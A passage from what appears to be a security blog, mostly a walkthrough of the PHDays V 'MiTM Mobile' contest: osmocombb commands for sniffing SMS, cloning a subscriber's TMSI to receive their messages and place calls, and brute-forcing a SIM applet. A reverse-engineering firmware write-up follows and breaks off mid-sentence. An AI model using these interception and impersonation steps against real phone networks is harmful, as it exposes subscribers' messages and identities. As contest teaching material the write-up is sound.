center;"><a href="http://4.bp.blogspot.com/-FgC71qH7wRo/VZZrgmwypsI/AAAAAAAAFIg/fIUNB4HdqbM/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="506" src="http://4.bp.blogspot.com/-FgC71qH7wRo/VZZrgmwypsI/AAAAAAAAFIg/fIUNB4HdqbM/s640/3.png" width="640" /></a></div><br /><b><span style="font-size: large;">Review of Tasks</span></b><br /><br />Some theory at first:<br /><br /><ul style="text-align: left;"><li><b><a href="https://en.wikipedia.org/wiki/International_mobile_subscriber_identity">IMSI</a> </b>— International Mobile Subscriber Identity stored in SIM-card. </li><li><a href="https://en.wikipedia.org/wiki/MSISDN"><b>MSISDN</b></a> — Mobile subscriber ISDN number phone number, assigned to IMSI in operator’s infrastructure</li><li><a href="http://en.wikipedia.org/wiki/Mobility_management#TMSI"><b>TMSI</b></a> — Temporary Mobile Subscriber Identity randomly assigned by the network to every mobile in the area, the moment it is switched on.</li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2qRbYIyaA4k/VZZr2Uwt9qI/AAAAAAAAFIo/1xejcnii6Mw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="404" src="http://4.bp.blogspot.com/-2qRbYIyaA4k/VZZr2Uwt9qI/AAAAAAAAFIo/1xejcnii6Mw/s640/4.png" width="640" /></a></div><br />IMSI is the magic number specified in the SIM card. It looks something like this — 250-01-ХХХХХХХХХХ, where 250 is the country code (Russia), 01 is the operator code (MTS), and ХХХХХХХХХХ is a unique ID. A subscriber is identified and authorized in the operator's network by the IMSI.<br /><br />In this case, we have the sysmocim SIM card with 901 country code, 70 operator code, and 0000005625 subscriber's ID in the operator's network (see fig.).<br /><br />The second thing you need to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's base, and not on the SIM card. During the call, the base station puts this number according to the IMSI <--> MSISDN conversion table (MSC/VLR has this function in the real network). Or it doesn't (in case of an anonymous call).<br /><br />TMSI is a 4-byte temporary identifier given to the subscriber after the authorization.<br /><br />Now that we know this, let's continue.<br /><br />We need to run the osmocombb stack. The actions are quite simple. You need to connect the cable to the computer and forward it inside the virtual machine. A device named /dev/ttyUSB0 should appear there. After that, you should connect a TURNED-OFF cell phone to the cable through an audio jack.<br /><br />Then you open two consoles. In the first one, you must run the following command:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-master/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin</span><br /><br />Now press the red button of the cell phone to turn it on. This command starts uploading firmware into the phone and opening the socket that will be a mediator between the phone and the programs. It is the so-called layer 1 of the OSI model. It establishes physical interaction with the network.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LIBxk5wEXkw/VZZsA4KdeTI/AAAAAAAAFIw/5MPSDK6gTTU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-LIBxk5wEXkw/VZZsA4KdeTI/AAAAAAAAFIw/5MPSDK6gTTU/s640/5.png" width="618" /></a></div><br />This is roughly what layer1 outputs to the console after it has been uploaded into the phone (this is not something of interest, though).<br /><br />In the second console, you must run the following command:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan -a 774 -i 127.0.0.1</span><br /><br />This command establishes layer 2-3 of the OSI model, namely — air tapping in search of CCCH (Common Control Channel) packages.<br /><br />774 is ARFCN we broadcast at. Yea, nobody needs to look for the channel of our operator. We did everything we could to make your life easier, our dear participants :)<br /><br />-i 127.0.0.1 is the interface you will send the packages to.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ky3qtHP8o4s/VZZsKLLRNOI/AAAAAAAAFI4/Dt8TgReIGXs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://1.bp.blogspot.com/-ky3qtHP8o4s/VZZsKLLRNOI/AAAAAAAAFI4/Dt8TgReIGXs/s640/6.png" width="640" /></a></div><br />Now, you launch Wireshark. It will do everything for you — for instance, it will gather all the necessary packages in SMS, unparce the TPDU/PDU format, and show everything easy to read.<br /><br />Remember, you were to intercept SMS for the first task. In order to make browsing in Wireshark more convenient and keep our screen "clean", you should set the filter at gsm_sms packages.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UTQMfKrVQnA/VZZsO--VrWI/AAAAAAAAFJA/kTD8-srye6E/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="454" src="http://3.bp.blogspot.com/-UTQMfKrVQnA/VZZsO--VrWI/AAAAAAAAFJA/kTD8-srye6E/s640/7.png" width="640" /></a></div><br />Now you can see SMS messages on the air. Congrats, you've completed the first task! If you were now at PHDays V, you would be able to see the SMS message containing the code for getting publes. The code was being aired constantly during the two days, every five minutes, an even at night.<br /><br />You must run layer1 again for the second task (or you can just keep it on after the previous one).<br /><br />In the second console, you run the following command as layer2-3:<br /><br /><span style="font-family: Courier New, Courier, monospace;">#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i 127.0.0.1</span><br /><br />Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, you must open the third console and run<br /><br /><span style="font-family: Courier New, Courier, monospace;">$ telnet 127.0.0.1 4247</span><br /><br />A Cisco-like interface will open. You must enable the extended mode:<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB> enable</span><br /><br />After that, you should display the list of commands available:<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# list</span><br /><br />What do you think the clone command does? Well, its name speaks for itself – you can clone a subscriber. In the description of the command, you can see it accepts TMSI as an argument. If you manage to find out the victim's TMSI and put in our phone, you will be able to connect to the network instead of the initial subscriber.<br /><br />During the whole conference, we were trying to send an SMS message to a phone number missing in the network. IF a participant would put the TMSI requested by the base station as the clone command parameter, he or she would get the flag with the code for money.<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# clone 1 5cce0f7f</span><br /><br />It was quite easy to see the base station request to the subscriber. You could look for gsmtap packages in Wireshark with the Paging Requests Type 1 request (the request the base station makes when a call is originated).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-H70LJ9m_IuQ/VZZsw1R_xSI/AAAAAAAAFJI/JnrqFqY7clk/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="416" src="http://3.bp.blogspot.com/-H70LJ9m_IuQ/VZZsw1R_xSI/AAAAAAAAFJI/JnrqFqY7clk/s640/8.png" width="640" /></a></div><br />Alternatively, you could use the second console that has mobile launched:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QoshXXCkHMg/VZZtlAIyP8I/AAAAAAAAFJQ/Dm4lSxmPf54/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="http://4.bp.blogspot.com/-QoshXXCkHMg/VZZtlAIyP8I/AAAAAAAAFJQ/Dm4lSxmPf54/s640/9.png" width="640" /></a></div><br />After you type the TMSI, you will get an SMS message intended for the initial subscriber.<br /><br />Now you have enough information for the third task. Here, you have to pretend to be another subscriber as in the previous task. You know his number, but not TMSI. What can you do? It's easy: you just have to send an SMS message to the subscriber or call him to the number 77777. You will see the base station requests to the 77777 subscriber as in the last example. Note: you must use another cell phone for the call or SMS; otherwise, your Motorola won't see the base station's broadcast requests intended for the target subscriber.<br /><br />After that, you need to put the TMSi into your phone by means of the clone command and make a call to the precious number!<br /><br /><span style="font-family: Courier New, Courier, monospace;">OsmocomBB# call 1 2000</span><br /><br />Now you take Motorola and listen to the code. If the participants have done everything right, they will hear it, otherwise — a joke will be the sole thing they get :)<br /><br />Additionally, there were SMS messages in the network that informed about a new voice message received. If the participants hadn't been lazy and had opened the phone book of the device, they would have seen the number of the voice mail. If you call this number, you can hear insider information — data about increase and decrease in the rate of MiTM Mobile shares.<br /><br />The fourth task was connected not quite with GSM, but with vulnerable SIM cards used for getting access to the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting — "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for searching vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So, you need to plug the SIM card into the phone, connect it to your computer and start the search. After a couple of minutes, you can analyze the data obtained:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wtjQXzHakow/VZZtv5PBQCI/AAAAAAAAFJY/9FU_cdSx5pc/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://2.bp.blogspot.com/-wtjQXzHakow/VZZtv5PBQCI/AAAAAAAAFJY/9FU_cdSx5pc/s640/10.png" width="640" /></a></div><br />Apart from lots of apps disclosing information enough for <a href="http://blog.ptsecurity.com/2014/12/4g-security-hacking-usb-modem-and-sim.html">key brute forcing</a>, you've been provided with a "red" application, which doesn't demand any secret keys for accessing. Let's analyse it separately:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-joIbqasR0MM/VZZt6h055II/AAAAAAAAFJg/dg59LQVGMYo/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="http://3.bp.blogspot.com/-joIbqasR0MM/VZZt6h055II/AAAAAAAAFJg/dg59LQVGMYo/s640/11.png" width="640" /></a></div><br />The last two bytes of the SIM card reply are the status bytes, where, for instance, 0x9000 means that the command has been completed successfully. In this case, you get 0x9124, which means there are 36 bytes the card wants to return to us. Let's change the program code a little and see, what kind of data it is.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6nMHW6_Swtc/VZZuBNLu1vI/AAAAAAAAFJo/tLlimhyak94/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="http://3.bp.blogspot.com/-6nMHW6_Swtc/VZZuBNLu1vI/AAAAAAAAFJo/tLlimhyak94/s640/12.png" width="640" /></a></div><br />After decoding, you will get:<br /><br /><span style="font-family: Courier New, Courier, monospace;">>>> ‘D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')</span><br /><span style="font-family: Courier New, Courier, monospace;">'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'</span><br /><br />You need to brute force all the possible CLAs and INSs for the instructions sent in the binary SMS message — and you will get the flag:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PXqJc7nus_o/VZZuH3XQWmI/AAAAAAAAFJw/1fhyQ35MOsI/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="http://2.bp.blogspot.com/-PXqJc7nus_o/VZZuH3XQWmI/AAAAAAAAFJw/1fhyQ35MOsI/s640/13.png" width="640" /></a></div><br /><span style="font-family: Courier New, Courier, monospace;">>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')</span><br /><span style="font-family: Courier New, Courier, monospace;">'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'</span><br /><br />That's it, as far as the tasks are concerned.<br /><br /><b><span style="font-size: large;">Contest winners and surprises</span></b><br /><br />All the PHDays participants could try hand at the MiTM Mobile contest together with the CTF teams: those who wished to take part were provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.<br /><br />However, the only one who managed to intercept the SMS message in the middle of the first day was Gleb Cherbov, who ultimately became the contest winner.<br /><br />Only the More Smoked Leet Chicken team managed to complete three tasks by the beginning of the second day. The fourth task was available only for the CTF participants, but everybody failed it.<br /><br />The forum visitors could notice that LTE and 3G were missing occasionally, and sometimes the network was not available if you come close to the zone with the GSM jammers that looked like this:<br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-igWcqxbaGbc/VZZuRKv6jpI/AAAAAAAAFJ4/29HHcsxluNU/s1600/7b40948643af48a5aae0ec8a2347cbc8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="516" src="http://1.bp.blogspot.com/-igWcqxbaGbc/VZZuRKv6jpI/AAAAAAAAFJ4/29HHcsxluNU/s640/7b40948643af48a5aae0ec8a2347cbc8.png" width="640" /></a></div><br />Some people were getting messages from the number 74957440144 (or from an anonymous one) with the text "SMS_from_bank" or some other "harmless spam". It was connected with the operation of the MiTm Mobile network.<br /><br />Also, some "luckers" got the following message by the end of the second day:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-gB5zwX_2PBw/VZZuWcjhQcI/AAAAAAAAFKA/JuasRfib9h4/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-gB5zwX_2PBw/VZZuWcjhQcI/AAAAAAAAFKA/JuasRfib9h4/s640/15.png" width="360" /></a></div><br />This joke has nothing to do with MiTM Mobile functioning, but it reminds everyone once again of general safety rules. Watch out for your pet phone, which suddenly starts finding the MosMetro_Free network (free WiFi network in Moscow underground) in a place where it shouldn't be, connects to it, and lots of programs get loose into a trap. Some of them use the phone number as an identifier. The attacker can get this number and then sends the messages out through the SMS gateway to all the "luckers".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OkgnvmJM8kc/VZZudfflGmI/AAAAAAAAFKI/TBxjDWdlq_A/s1600/706b082b26d94077a67941fad4e80390.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="http://2.bp.blogspot.com/-OkgnvmJM8kc/VZZudfflGmI/AAAAAAAAFKI/TBxjDWdlq_A/s640/706b082b26d94077a67941fad4e80390.png" width="640" /></a></div><br />P.S. Here are the details about the network components for all those who would like to make a contest similar to our MitM Mobile.<br /><span class="Apple-tab-span" style="white-space: pre;"> </span><br />The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the manuals concerning the configuration can be found at umtrx.org or osmocom.org. You may also use a ready-made solution from UmTRX — UmDESK, it has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.<br /><br />You can find an image of the osmocombb stack <a href="http://phdays.ru/ctf_mobile.7z">here</a> (we highly recommend you to have VMWare 11). This build is enough for experimenting. SIM cards are not necessary, but you have to get a cell phone and any USB-UART cable.<br /><br />You could choose any cell phone from the list: <a href="http://bb.osmocom.org/trac/wiki/Hardware/Phones">http://bb.osmocom.org/trac/wiki/Hardware/Phones</a><br />Cables: <a href="http://bb.osmocom.org/trac/wiki/Hardware/SerialCable">http://bb.osmocom.org/trac/wiki/Hardware/SerialCable</a><br /><br />And, yes, you can find PL2303 and FT232 almost everywhere. Unsoldering a 2.5 mini-jack is piece of cake.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sL1v38Cf_sQ/VZZusP72kRI/AAAAAAAAFKQ/wOHW34Tk5Hg/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-sL1v38Cf_sQ/VZZusP72kRI/AAAAAAAAFKQ/wOHW34Tk5Hg/s640/16.png" width="640" /></a></div><br />You can order SIM cards and the cable here: <a href="http://shop.sysmocom.de/">http://shop.sysmocom.de/</a><br /><br />Such as<br />USB-UART (CP2102): <a href="http://shop.sysmocom.de/products/cp2102-25">http://shop.sysmocom.de/products/cp2102-25</a><br />SIM cards: <a href="http://shop.sysmocom.de/t/sim-card-related/sim-cards">http://shop.sysmocom.de/t/sim-card-related/sim-cards</a><br /><br />You can find cell phones on Ebay, buy in pedestrian underpasses, or order in China: on average, you will spend 10$ per phone.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EMhhPB2G7to/VZZvSq6Jc0I/AAAAAAAAFKY/UOdOiMMOvzA/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-EMhhPB2G7to/VZZvSq6Jc0I/AAAAAAAAFKY/UOdOiMMOvzA/s640/17.png" width="640" /></a></div><br />We want to express special gratitude to the guys from Fairwaves (they are the ones who make UmTRX, UmDESK, UmROCKET, and etc.) for consulting and the equipment provided for testing. They do a GREAT thing! And also, special thanks to Ivan.<br /><br /></div>Unknownnoreply@blogger.com604tag:blogger.com,1999:blog-5176771794789502609.post-55256704874436309752015-06-30T11:07:00.000+03:002015-06-30T11:08:03.146+03:00Best Reverser Write-Up: Analyzing Uncommon Firmware<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-WT2Y1ftrTVU/VZJKCDEyK2I/AAAAAAAAFIA/IEGzX1RUD8U/s1600/new29-061.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-WT2Y1ftrTVU/VZJKCDEyK2I/AAAAAAAAFIA/IEGzX1RUD8U/s1600/new29-061.jpg" /></a></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">While developing tasks for PHDays’ contest in reverse engineering, we had a purpose of replicating real problems that RE specialists might face. At the same time we tried to avoid allowing cliche solutions.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"></span></span><br /><a name='more'></a><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US">Let us define what common reverse engineering tasks look like. Given an executable file for Windows (or Linux, MacOS or any other widely-used operating system). We can run it, watch it in a debugger, and twist it in virtual environments in any way possible. File format is known. The processor’s instruction set is x86, AMD64 or ARM. Library functions and system calls are documented. The equipment can be accessed through the operating system only. Using tools like IDAPro and H</span>е<span lang="EN-US">xRays makes analysis of such applications very simple, while debug protection, virtual machines with their own instruction sets, an</span><span lang="EN-US">d obfuscation could complicate the task</span><span lang="EN-US">. But large vendors hardly ever use any of those in their programs. So there’s no point in developing a contest aimed at demonstrating skills that are rarely addressed in practice.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US">However, there’s another area, where reverse engineering </span><span lang="EN-US">became more in-demand, that’s firmware analysis. The input file</span><span lang="EN-US"> (firmware) could be presented in any format, can be packed, encrypted. The operating system could be unpopular, or there could be no operating system at all. Parts of the code could not be changed with firmware updates. The processor could be based on any architecture. (For example, IDAPro “knows” not more than 100 different processors.) And of course, there’s no documentation available, debugging or code execution cannot be performed―a firmware is presented, but there’s no device.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><span style="font-family: inherit;"><span lang="EN-US" style="line-height: 115%;">Our contest’s participants needed to analyze an executable </span><span style="line-height: 115%;"><a href="http://www.phdays.ru/download/fwldr.zip"><span lang="EN-US">file</span></a></span><span lang="EN-US" style="line-height: 115%;">and find the correct key and the relative email (any internet user was able to take part in the contest).</span></span><br /><span lang="EN-US" style="font-family: "Calibri",sans-serif; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: "MS Mincho"; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-fareast; mso-hansi-theme-font: minor-latin;"><br /></span><br /><h3 style="text-align: left;"><span lang="EN-US"><span style="font-size: large;">Part One: Loader</span></span></h3><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-family: "Calibri",sans-serif; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: "MS Mincho"; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-fareast; mso-hansi-theme-font: minor-latin;"> </span><span style="color: windowtext;"><span style="font-family: inherit;">At the first stage, the input file is an ELF file compiled with a cross compiler for the PA-RISC architecture. IDA can work with this architecture, but not as good as with x86. Most requests to stack variables are not identified automatically, and you’ll have to do it manually. At least you can see all the library functions (log, printf, memcpy, strlen, fprintf, sscanf, memset, strspn) and even symbolic names for some functions (с32, exk, cry, pad, dec, cen, dde). The program expects two input arguments: an email and key.</span></span></div><div class="MsoPlainText"><span style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-T_W6ASVm1eo/VZJKCJPTxoI/AAAAAAAAFHc/NdgnNgkRLjU/s1600/new29-062.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="39" src="http://4.bp.blogspot.com/-T_W6ASVm1eo/VZJKCJPTxoI/AAAAAAAAFHc/NdgnNgkRLjU/s640/new29-062.png" width="640" /></a></div><div class="MsoPlainText"><span style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-family: Calibri, sans-serif;"><br /></span></div><div class="MsoPlainText"><span style="font-family: inherit;">It’s not hard to figure out that the key should consist of two parts separated by the “-“ character. The first part should consist of seven MIME64 characters (0-9A-Za-z+/), the second part of 32 hex characters that translate to 16 bytes.</span></div><div class="MsoPlainText"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Ku27xjpwP1o/VZJKCKTfnhI/AAAAAAAAFHk/72TY7TgC2Nk/s1600/new29-063.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="50" src="http://1.bp.blogspot.com/-Ku27xjpwP1o/VZJKCKTfnhI/AAAAAAAAFHk/72TY7TgC2Nk/s640/new29-063.png" width="640" /></a></div><div class="MsoPlainText"><br /></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US"></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">Further we can see calls to c32 functions that result in:<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;">t = c32(-1, argv[1], strlen(argv[1])+1)<o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US"> </span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;">k = ~c32(t, argv[2], strlen(argv[2])+1)<o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US" style="font-family: "Courier New"; mso-ansi-language: EN-US;"><br /></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Name of the function is a hint: it’s a СRC32 function, which is confirmed by the constant 0xEDB88320.<o:p></o:p></span></span></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Next, we call the dde function (short for doDecrypt), and it receives the inverted output of the CRC32 function (encryption key) as the first argument, and the address and the size of the encrypted array as the second and third ones.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Decryption is performed by BTEA (block tiny encryption algorithm) based on the code taken from Wikipedia. We can guess that it’s BTEA from the use of the constant DELTA==0x9E3779B9. It’s also used in other algorithms on which BTEA is based on, but there are not many of them.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">The key should be of 128-bit width, but we receive only 32 bits from CRC32. So we get three more DWORDs from the exk function (expand_key) by multiplying the previous value by the same DELTA.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">However, the use of BTEA is uncommon. First of all, the algorithm supports a variable-width block size, and we use a block of 12-bytes width (there are processors that have 24-bit width registers and memory, then why should we use only powers of two). And in the second place, we switched encryption and decryption functions.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">Since data stream is encrypted, cipher block chaining is applied. Enthropy is calculated for decrypted data in the cen function (calc_enthropy). If its value exceeds 7, the decryption result is considered incorrect and the program will exit.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoPlainText"><span lang="EN-US" style="color: windowtext; font-size: 11pt;"><span style="font-family: inherit;">The encryption key is 32-bit width, so it seems to be easily brute-forced. However, in order to check every key we need to decrypt 80 kilobytes of data, and then calculate enthropy. So brute-forcing the encryption key will take a lot of time.<o:p></o:p></span></span></div><div class="MsoPlainText"><br /></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">But after the calculation, we call the pad function (strip_pad), which check and remove PKCS#7 padding. Due to CBC features, we need to decrypt only one block (the last one), extract N byte, check whether its range is between 1 and 12 (inclusive) and each of the last N bytes has value N. This allows reducing the number of operations needed to check one key. But if the last encrypted byte equals 1 (which is true for 1/256 keys), the check should be still performed.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">The faster method is to assume that decoded</span></span><span lang="EN"> <span class="hps">data have a DWORD-</span>aligned<span class="hps"> length (</span>4 bytes). <span class="hps">Then</span> <span class="hps">in the last</span> <span class="hps">DWORD of the</span> <span class="hps">last block</span> there <span class="hps">may be</span> <span class="hps">only one</span> <span class="hps">of three possible values: 0x04040404, 0x08080808</span> <span class="hps">or</span> <span class="hps">0x0C0C0C0C.</span> <span class="hps">By</span> <span class="hps">using</span> <span class="hps">heuristic and brute force methods</span> you <span class="hps">can</span> <span class="hps">run through all possible</span> <span class="hps">keys</span> and <span class="hps">find the right one</span> <span class="hps">in less than 20</span> <span class="hps">minutes. <o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span style="font-family: inherit;"><br /></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">If all the checks after</span></span><span lang="EN"> the <span class="hps">decryption</span> <span class="hps">(</span>entropy and <span class="hps">the integrity of the</span> <span class="hps">padding</span>) <span class="hps">are successful</span>, we call the <span class="hps">fire_second_proc </span>function<span class="hps">,</span> <span class="hps">which</span> <span class="hps">simulates the</span><span class="hps">launch of the second</span> <span class="hps">CPU and</span> the <span class="hps">loading of</span> <span class="hps">decrypted data</span> <span class="hps">of the </span>firmware (<span class="hps">modern devices usually have</span><span class="hps">more than one processor</span>—<span class="hps">with different</span><span class="hps">architectures)</span>.<o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">If</span></span><span lang="EN"> <span class="hps">the second processor</span><span class="hps">launches</span>, <span class="hps">it</span> <span class="hps">receives the user’s email and 16 bytes</span> with the second part of the key <span class="hps">via the function</span> <span class="hps">send_auth_data</span>. <span class="hps">At this point</span> <span class="hps">we made a mistake</span>: <span class="hps">there was the size of</span> <span class="hps">the string</span> <span class="hps">with</span> the <span class="hps">email</span> instead of <span class="hps">the size of the</span> <span class="hps">second part of the</span> <span class="hps">key.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span style="font-family: inherit;"><br /></span></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><h3 style="text-align: left;"><b><span style="font-size: large;">Part Two: Firmware</span></b></h3><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">The analysis of</span></span><span lang="EN"> <span class="hps">the second part is a little bit more complicated</span>. <span class="hps">There was no ELF file,</span> <span class="hps">only a memory image—</span>w<span class="hps">ithout headings</span>, <span class="hps">function names</span>, and other <span class="hps">metadata</span>. <span class="hps">Type of the processor</span><span class="hps">and</span> <span class="hps">load address were unknown as well</span>.</span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">We thought of brute force as the</span></span><span lang="EN"> <span class="hps">algorithm of determining the</span> <span class="hps">processor architecture</span>. <span class="hps">Open</span> in <span class="hps">IDA,</span><span class="hps">set</span> <span class="hps">the following type</span>, <span class="hps">and repeat</span> <span class="hps">until IDA</span> <span class="hps">shows</span><span class="hps">something similar to</span> <span class="hps">a code</span>. <span class="hps">The brute force</span> <span class="hps">should lead</span> <span class="hps">to the conclusion that</span> <span class="hps">it is</span> <span class="hps">big-endian SPARC.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span style="font-family: inherit;"><br /></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Now we need</span></span><span lang="EN"> <span class="hps">to determine</span> <span class="hps">the load address</span>. <span 